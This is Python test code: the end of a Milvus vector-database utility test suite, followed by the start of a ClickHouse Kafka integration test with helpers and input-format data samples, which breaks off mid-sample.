@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set left vectors as random vectors, right vectors are entities
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_l = cf.gen_vectors(nb // 2, default_dim)
log.info("Extract entities from collection as right vectors")
op_l = {"float_vectors": vectors_l}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
log.info("Calculate distance between vector and entities")
for i in range(len(partitions)):
vectors_r = vectors[i].loc[:, default_field_name]
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set right vectors as random vectors, left vectors are entities
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_r = cf.gen_vectors(nb // 2, default_dim)
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
vectors_l = vectors[i].loc[:, default_field_name]
log.info("Extract entities from partition %d as left vector" % i)
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculate distance between vector and entities from partition %d" % i)
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
class TestUtilityAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multi_collections(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
for name in [c_name, c_name_2]:
res, _ = self.utility_wrap.has_collection(name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multi_collection(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
res, _ = self.utility_wrap.list_collections()
for name in [c_name, c_name_2]:
assert name in res
def test_drop_multi_collection_concurrent(self):
"""
target: test concurrent drop collection
        method: multiple threads concurrently drop different collections
expected: drop successfully
"""
thread_num = 3
threads = []
c_names = []
num = 5
for i in range(thread_num * num):
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
c_names.append(c_name)
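        # note added for clarity: despite its name, this helper only verifies that each
        # collection exists and then drops it; the collections are created in the loop above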
def create_and_drop_collection(names):
for name in names:
assert self.utility_wrap.has_collection(name)[0]
self.utility_wrap.drop_collection(name)
assert not self.utility_wrap.has_collection(name)[0]
for i in range(thread_num):
x = threading.Thread(target=create_and_drop_collection, args=(c_names[i * num:(i + 1) * num],))
threads.append(x)
x.start()
for t in threads:
t.join()
log.debug(self.utility_wrap.list_collections()[0])
@pytest.mark.tags(CaseLabel.L1)
def test_get_query_segment_info_empty_collection(self):
"""
target: test getting query segment info of empty collection
method: init a collection and get query segment info
expected: length of segment is 0
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_w.load()
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_get_growing_query_segment_info(self):
"""
target: test getting growing query segment info of collection with data
method: init a collection, insert data, load, search, and get query segment info
expected:
1. length of segment is greater than 0
            2. the sum of num_rows over all segments equals the number of inserted entities
"""
import random
dim = 128
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 3000
nq = 2
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
collection_w.load()
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors, default_field_name, ct.default_search_params, ct.default_limit)
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) > 0
segment_ids = []
cnt = 0
for r in res:
log.info(f"segmentID {r.segmentID}: state: {r.state}; num_rows: {r.num_rows} ")
if r.segmentID not in segment_ids:
segment_ids.append(r.segmentID)
cnt += r.num_rows
assert cnt == nb
@pytest.mark.tags(CaseLabel.L1)
def test_get_sealed_query_segment_info(self):
"""
target: test getting sealed query segment info of collection with data
method: init a collection, insert data, flush, load, and get query segment info
expected:
1. length of segment is greater than 0
            2. the sum of num_rows over all segments equals the number of inserted entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 3000
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
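        # accessing num_entities triggers a flush so the inserted rows become sealed segments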
collection_w.num_entities
collection_w.load()
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) > 0
segment_ids = []
cnt = 0
for r in res:
log.info(f"segmentID {r.segmentID}: state: {r.state}; num_rows: {r.num_rows} ")
if r.segmentID not in segment_ids:
segment_ids.append(r.segmentID)
cnt += r.num_rows
assert cnt == nb
@pytest.mark.tags(CaseLabel.L1)
def test_get_sealed_query_segment_info_after_create_index(self):
"""
target: test getting sealed query segment info of collection with data
method: init a collection, insert data, flush, create index, load, and get query segment info
expected:
1. length of segment is greater than 0
            2. the sum of num_rows over all segments equals the number of inserted entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 3000
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
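        # accessing num_entities triggers a flush so sealed segments exist before indexing and loading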
collection_w.num_entities
collection_w.create_index(default_field_name, default_index_params)
collection_w.load()
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) > 0
segment_ids = []
cnt = 0
for r in res:
log.info(f"segmentID {r.segmentID}: state: {r.state}; num_rows: {r.num_rows} ")
if r.segmentID not in segment_ids:
segment_ids.append(r.segmentID)
cnt += r.num_rows
assert cnt == nb
@pytest.mark.tags(CaseLabel.Loadbalance)
def test_load_balance_normal(self):
"""
target: test load balance of collection
method: init a collection and load balance
expected: sealed_segment_ids is subset of des_sealed_segment_ids
"""
# init a collection
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
ms = MilvusSys()
nb = 3000
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
# get sealed segments
collection_w.num_entities
# get growing segments
collection_w.insert(df)
collection_w.load()
# prepare load balance params
res, _ = self.utility_wrap.get_query_segment_info(c_name)
segment_distribution = cf.get_segment_distribution(res)
all_querynodes = [node["identifier"] for node in ms.query_nodes]
assert len(all_querynodes) > 1
all_querynodes = sorted(all_querynodes,
key=lambda x: len(segment_distribution[x]["sealed"])
if x in segment_distribution else 0, reverse=True)
src_node_id = all_querynodes[0]
des_node_ids = all_querynodes[1:]
sealed_segment_ids = segment_distribution[src_node_id]["sealed"]
# load balance
self.utility_wrap.load_balance(src_node_id, des_node_ids, sealed_segment_ids)
# get segments distribution after load balance
res, _ = self.utility_wrap.get_query_segment_info(c_name)
segment_distribution = cf.get_segment_distribution(res)
des_sealed_segment_ids = []
for des_node_id in des_node_ids:
des_sealed_segment_ids += segment_distribution[des_node_id]["sealed"]
# assert sealed_segment_ids is subset of des_sealed_segment_ids
assert set(sealed_segment_ids).issubset(des_sealed_segment_ids)
test.py
import os.path as p
import random
import threading
import time
import pytest
import io
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
from helpers.network import PartitionManager
import json
import subprocess
import kafka.errors
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.admin import NewTopic
from kafka.protocol.admin import DescribeGroupsResponse_v1, DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
import avro.schema
from confluent.schemaregistry.client import CachedSchemaRegistryClient
from confluent.schemaregistry.serializers.MessageSerializer import MessageSerializer
import socket
from google.protobuf.internal.encoder import _VarintBytes
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
import kafka_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
config_dir='configs',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml', 'configs/kafka_macros.xml' ],
with_kafka=True,
with_zookeeper=True,
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def kafka_produce(topic, messages, timestamp=None):
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
# print ("Produced {} messages for topic {}".format(len(messages), topic))
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
    consumer.subscribe(topics=(topic,))
for toppar, messages in consumer.poll(5000).items():
if toppar.topic == topic:
for message in messages:
yield message.value
consumer.unsubscribe()
consumer.close()
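# Usage sketch (hypothetical topic name):
#   for value in kafka_consume('some_topic'):
#       print(value)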
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
    data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic=topic, value=data)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
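# Usage sketch (the registry URL is hypothetical, not part of this test file):
#   client = CachedSchemaRegistryClient('http://localhost:8081')
#   msg = avro_confluent_message(client, {'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1})
#   kafka_produce('avro_topic', [msg])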
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
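    # the empty message below is intentional: JSONAsString should skip it and only log
    # "return no rows" for that offset (see the contains_in_log assert at the end)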
kafka_produce('kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }', '{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log("Parsing of message (topic: kafka_json_as_string, partition: 0, offset: 1) return no rows")
@pytest.mark.timeout(300)
def test_kafka_formats(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow' : {
'data_sample' : [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow' : {
'data_sample' : [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes' : {
'data_sample' : [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV' : {
'data_sample' : [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV' : {
'data_sample' : [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV' : {
'data_sample' : [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames' : {
'data_sample' : [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values' : {
'data_sample' : [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames' : {
'data_sample' : [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes' : {
'data_sample' : [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp' : {
'data_sample' : [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': ", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native' : {
'data_sample': [
'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
